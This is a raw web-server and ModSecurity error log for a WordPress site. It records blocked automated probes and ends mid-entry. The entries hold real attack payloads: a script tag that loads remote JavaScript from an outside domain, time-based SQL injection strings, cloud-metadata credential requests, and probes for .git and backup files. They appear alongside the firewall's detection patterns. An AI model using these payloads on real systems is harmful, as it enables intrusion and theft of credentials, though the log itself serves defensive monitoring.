rule, client: 158.179.211.70, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Mar 05 02:04:15.048908 2025] [autoindex:error] [pid 32663:tid 139801890076416] [client 135.235.163.186:45056] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Mar 05 03:42:50.958273 2025] [ssl:warn] [pid 29579:tid 140346854856576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 05 03:42:51.261708 2025] [ssl:warn] [pid 29580:tid 140346854856576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 05 03:42:51.839119 2025] [ssl:warn] [pid 29580:tid 140346854856576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 05 03:42:56.149296 2025] [ssl:warn] [pid 29580:tid 140346854856576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 05 03:42:58.487526 2025] [ssl:warn] [pid 30009:tid 139918993762176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 05 03:42:58.709671 2025] [ssl:warn] [pid 30010:tid 139918993762176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 05 06:21:55.054423 2025] [:error] [pid 30504:tid 139918802622208] [client 179.43.191.19:48546] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Z8gz0yKZ4z-096pgcq6tfAAAAME"], referer: https://investigacionperu.com [Wed Mar 05 16:15:01.961062 2025] [autoindex:error] [pid 30025:tid 139918651139840] [client 64.227.143.222:59128] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 06 03:08:22.759608 2025] [ssl:warn] [pid 11402:tid 139821595703168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 06 03:08:22.971894 2025] [ssl:warn] [pid 11403:tid 139821595703168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 06 03:08:23.532250 2025] [ssl:warn] [pid 11403:tid 139821595703168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 06 03:08:27.885089 2025] [ssl:warn] [pid 11403:tid 139821595703168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 06 03:08:30.166976 2025] [ssl:warn] [pid 11835:tid 139936574949248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 06 03:08:30.341540 2025] [ssl:warn] [pid 11836:tid 139936574949248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 06 09:05:40.261168 2025] [:error] [pid 11853:tid 139936208484096] [client 5.181.86.4:46858] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/;select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtGsxMbC4b8YQfs1xWAAAAA0"] [Thu Mar 06 09:05:40.370174 2025] [:error] [pid 11855:tid 139936149735168] [client 5.181.86.4:46860] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/';select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtM171ojkLH46reLdMQAAAJQ"] [Thu Mar 06 09:05:40.479329 2025] [:error] [pid 11855:tid 139936124557056] [client 5.181.86.4:46862] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/\\x22;select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtM171ojkLH46reLdMgAAAJc"] [Thu Mar 06 09:05:40.588463 2025] [:error] [pid 12414:tid 139936141342464] [client 5.181.86.4:46864] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/);select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtGJFP69n9GX3r6DDEwAAANU"] [Thu Mar 06 09:05:40.697362 2025] [:error] [pid 11853:tid 139936116164352] [client 5.181.86.4:46866] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/');select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtGsxMbC4b8YQfs1xWQAAABg"] [Thu Mar 06 09:05:40.807138 2025] [:error] [pid 12414:tid 139936183305984] [client 5.181.86.4:46868] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/\\x22);select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtGJFP69n9GX3r6DDFAAAANA"] [Thu Mar 06 09:05:41.969828 2025] [:error] [pid 11854:tid 139936225269504] [client 5.181.86.4:46872] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/;select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtXHgjOfNmb7MgIlqnAAAAEs"] [Thu Mar 06 09:05:42.079102 2025] [:error] [pid 11854:tid 139936124557056] [client 5.181.86.4:46874] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/';select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtnHgjOfNmb7MgIlqnQAAAFc"] [Thu Mar 06 09:05:42.188323 2025] [:error] [pid 11854:tid 139936174913280] [client 5.181.86.4:46876] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/\\x22;select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtnHgjOfNmb7MgIlqngAAAFE"] [Thu Mar 06 09:05:42.297289 2025] [:error] [pid 11854:tid 139936141342464] [client 5.181.86.4:46878] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/);select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtnHgjOfNmb7MgIlqnwAAAFU"] [Thu Mar 06 09:05:42.406370 2025] [:error] [pid 11854:tid 139936267233024] [client 5.181.86.4:46880] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/');select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtnHgjOfNmb7MgIlqoAAAAEY"] [Thu Mar 06 09:05:42.516235 2025] [:error] [pid 11854:tid 139936250447616] [client 5.181.86.4:46882] [client 5.181.86.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:url: https://investigacionperu.com/2020/05/20/materiales-del-taller-de-tesis/\\x22);select sleep({tow})#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Z8mrtnHgjOfNmb7MgIlqoQAAAEg"] [Thu Mar 06 11:06:15.526338 2025] [autoindex:error] [pid 12414:tid 139936267233024] [client 64.227.143.222:49210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 06 15:54:44.240147 2025] [authz_core:error] [pid 12414:tid 139936200091392] [client 46.101.111.185:54334] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/06 15:54:49 [error] 11818#11818: *159055 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Mar 06 16:08:39.243034 2025] [autoindex:error] [pid 11854:tid 139936116164352] [client 144.91.70.1:54556] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 06 22:22:27.414348 2025] [authz_core:error] [pid 11854:tid 139936183305984] [client 209.97.180.8:60682] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/06 22:22:32 [error] 11818#11818: *162663 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Mar 07 03:50:33.244532 2025] [ssl:warn] [pid 26987:tid 140318299686784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 07 03:50:33.555768 2025] [ssl:warn] [pid 26988:tid 140318299686784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 07 03:50:34.196336 2025] [ssl:warn] [pid 26988:tid 140318299686784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 07 03:50:38.170750 2025] [ssl:warn] [pid 26988:tid 140318299686784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 07 03:50:40.452940 2025] [ssl:warn] [pid 27423:tid 140258158000000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 07 03:50:40.656313 2025] [ssl:warn] [pid 27424:tid 140258158000000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 07 07:32:51.567278 2025] [autoindex:error] [pid 27443:tid 140257941681920] [client 135.235.163.186:41630] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 07 15:39:39.495716 2025] [autoindex:error] [pid 27442:tid 140257844516608] [client 64.227.143.222:50344] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 07 18:08:15.694826 2025] [:error] [pid 27992:tid 140257785767680] [client 193.41.206.246:53362] [client 193.41.206.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z8t8X_gZyY7aYkQW3jwADgAAAM4"] [Fri Mar 07 18:09:34.320302 2025] [:error] [pid 27442:tid 140257743804160] [client 193.41.206.246:53526] [client 193.41.206.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z8t8rsfj9UFUdThShyM2igAAAFM"] [Fri Mar 07 18:10:37.869127 2025] [:error] [pid 27443:tid 140257941681920] [client 193.41.206.246:53654] [client 193.41.206.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z8t87fOHN7FvRPw7whqCuAAAAIQ"] [Fri Mar 07 18:10:37.944129 2025] [:error] [pid 27442:tid 140257768982272] [client 193.41.206.246:53656] [client 193.41.206.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-default-ssm/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z8t87cfj9UFUdThShyM2nwAAAFA"] [Fri Mar 07 18:10:38.019536 2025] [:error] [pid 27441:tid 140257836123904] [client 193.41.206.246:53658] [client 193.41.206.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: 